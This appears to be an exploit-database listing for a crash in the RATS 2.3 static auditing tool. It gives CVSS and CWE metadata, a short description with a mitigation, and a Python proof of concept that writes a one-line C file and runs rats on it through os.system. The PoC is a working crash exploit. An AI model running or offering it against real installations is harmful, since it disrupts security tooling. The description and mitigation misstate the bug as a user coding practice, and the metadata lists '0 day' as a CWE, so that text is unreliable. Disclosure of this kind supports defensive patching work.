RATS 2.3 Array Out Of Block Crash

vendor:

Rough Auditing Tool for Security

by:

David Silveiro

7,5

CVSS

HIGH

Out of Block Array Crash

119

CWE

Product Name: Rough Auditing Tool for Security

Affected Version From: RATS 2.3

Affected Version To: RATS 2.3

Patch Exists: NO

Related CWE: 0 day

CPE: 2.3:RATS

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Ubuntu 14.04 LTS

2016

RATS 2.3 Array Out Of Block Crash

This exploit is for RATS 2.3 which is a Rough Auditing Tool for Security. The exploit is for an Out of Block Array Crash which is caused when an array is declared outside of the block scope. This causes a crash when the program is run.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all arrays are declared within the block scope.

Source

Exploit-DB raw data:

# Exploit Title: RATS 2.3 Array Out of Block Crash
# Date: 29th April 2016
# Exploit Author: David Silveiro
# Author Contact: twitter.com/david_silveiro
# Website: Xino.co.uk
# Software Link: https://code.google.com/archive/p/rough-auditing-tool-for-security/downloads
# Version: RATS 2.3
# Tested on: Ubuntu 14.04 LTS
# CVE : 0 day

from os import system


def crash():


    with open('crash.c', 'w') as file:
        file.write("char g [MAX_SIZE];") # Out of Block array, causes crash

    try:
        com = ('rats -w3 --xml crash.c')
        return system(com)

    except:
        print("Is RATS installed?")


def main():

    print("Author:   David Silveiro                      ")
    print("Website:  Xino.co.uk                          ")
    print("Title:    RATS 2.3 Array Out Of Block Crash \n")

    crash()


if __name__ == "__main__":
    main()